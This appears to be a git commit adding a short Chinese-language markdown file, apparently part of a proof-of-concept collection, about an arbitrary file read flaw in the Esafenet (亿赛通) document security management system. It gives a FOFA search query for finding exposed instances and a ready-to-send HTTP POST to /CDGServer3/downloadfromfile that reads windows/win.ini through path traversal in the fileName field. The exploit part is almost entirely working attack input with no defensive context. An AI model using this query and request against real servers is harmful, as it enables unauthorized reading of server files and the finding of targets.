Create 亿赛通电子文档安全管理系统downloadfromfile存在任意文件读取漏洞.md

2024-05-16 19:26:02 +08:00 · 2024-05-16 19:26:02 +08:00 · 83ffd34e35
commit 83ffd34e35
parent 0c64985dc4
1 changed files with 15 additions and 0 deletions
--- a/亿赛通电子文档安全管理系统downloadfromfile存在任意文件读取漏洞.md
+++ b/亿赛通电子文档安全管理系统downloadfromfile存在任意文件读取漏洞.md
@ -0,0 +1,15 @@
+## 亿赛通电子文档安全管理系统downloadfromfile存在任意文件读取漏洞
+
+## fofa
+```
+body="/CDGServer3/index.jsp"
+```
+## poc
+```
+POST /CDGServer3/downloadfromfile HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+
+fileName=../../../../../../../../../../../windows/win.ini
+```